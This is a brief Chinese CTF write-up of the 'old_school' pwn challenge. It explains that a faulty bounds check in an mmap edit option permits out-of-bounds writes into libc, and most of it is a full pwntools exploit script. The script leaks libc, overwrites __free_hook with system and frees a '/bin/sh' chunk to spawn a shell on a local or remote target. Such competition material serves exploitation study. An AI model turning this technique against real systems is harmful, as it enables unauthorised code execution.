[Pwn] old_school - cpt.shao xp0int Posted on Aug 28 2020 mmap edit的地方有个瞎写的检查,可以直接越界写libc上面的内容,直接改free_hook,system("/bin/sh")结束。 ```python from pwn import * import re context.terminal = ['tmux', 'splitw', '-h'] context.arch = 'amd64' context.log_level = "debug" env = {'LD_PRELOAD': ''} if len(sys.argv) == 1: p = process('./oldschool') elif len(sys.argv) == 3: p = remote(sys.argv[1], sys.argv[2]) bp_list = [] se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) sea = lambda delim,data :p.sendafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr)) # gdb.attach(p, gdbcmd) def alloc(idx, size): sla("choice: ", "1") sla("Index: ", str(idx)) sla("Size: ", str(size)) def delete(idx): sla("choice: ", "4") sla("Index: ", str(idx)) def show(idx): sla("choice: ", "3") sla("Index: ", str(idx)) def edit(idx, content): sla("choice: ", "2") sla("Index: ", str(idx)) sea("Content: ", content) def mmap_alloc(idx): sla("choice: ", "6") sla("start: ", str(idx)) def mmap_edit(idx, value): sla("choice: ", "7") sla("Index: ", str(idx)) sla("Value: ", str(value)) def mmap_delete(): sla("choice: ", "8") for i in range(0x9): alloc(i, 0x1ff) for i in range(0x8): delete(i) for i in range(0x7): alloc(i, 0x1ff) alloc(7, 0x80) show(7) ru("Content: ") leak_libc = u32(rc(4)) info_addr("leak_libc", leak_libc) libc = leak_libc - 0x1d88e0 free_hook = libc + 0x1d98d0 target = libc + 0x1d87d8 # top_chunk_addr system = libc + 0x3d250 info_addr("libc", libc) info_addr("target", target) mmap_alloc(0x1000000) mmap_edit((free_hook -0xe1000000)/4, system) edit(0, "/bin/sh\n") delete(0) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay 0x00 题目名称 [强网先锋] Funhash - Donek1
没有帐号? 立即注册